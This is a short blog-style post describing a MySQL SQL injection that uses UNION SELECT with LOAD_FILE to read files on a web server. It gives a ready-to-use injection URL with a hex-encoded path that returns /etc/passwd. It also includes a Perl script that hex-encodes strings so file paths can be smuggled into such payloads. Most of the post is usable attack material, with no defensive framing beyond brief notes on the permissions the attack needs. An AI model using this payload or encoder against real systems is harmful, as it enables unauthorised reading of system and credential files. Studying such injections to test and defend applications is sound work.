MYSQL LOAD_FILE SQL Injection

So today I was reading up on some SQL injection techniques, and came across one that I had not seen before. I found out that it is possible to use a UNION SELECT with the built-in MYSQL LOAD_FILE function, to read the contents of any file on the system. This only works if the user has been granted permission to use the LOAD_FILE function, and of course MYSQL DAEMON must have permission to read the file. Also, I found out that the LOAD_FILE function can read use with HEX decimal characters.

Example Injection: www.example.com/article.php?id=1+union+select+LOAD_FILE(0x2f6574632f706173737764)

This will return the contents of the /etc/passwd on a linux machine.

I also came across a handy perl script today that will encode a given string into HEX.

Perl HEX converter:

Note: There is a underscore between LOAD and FILE.


print "Enter string to encode:";
$str=<STDIN>;chomp $str;

$enc = encode($str); print "Hex Encoded value: 0x$enc\n";

sub encode{ #Sub to encode
@subvar=@_;
my $sqlstr =$subvar[0];

@ASCII = unpack("C*", $sqlstr);
foreach $line (@ASCII) {

$encoded = sprintf('%lx',$line);
$encoded_command .= $encoded;

}
return $encoded_command;

}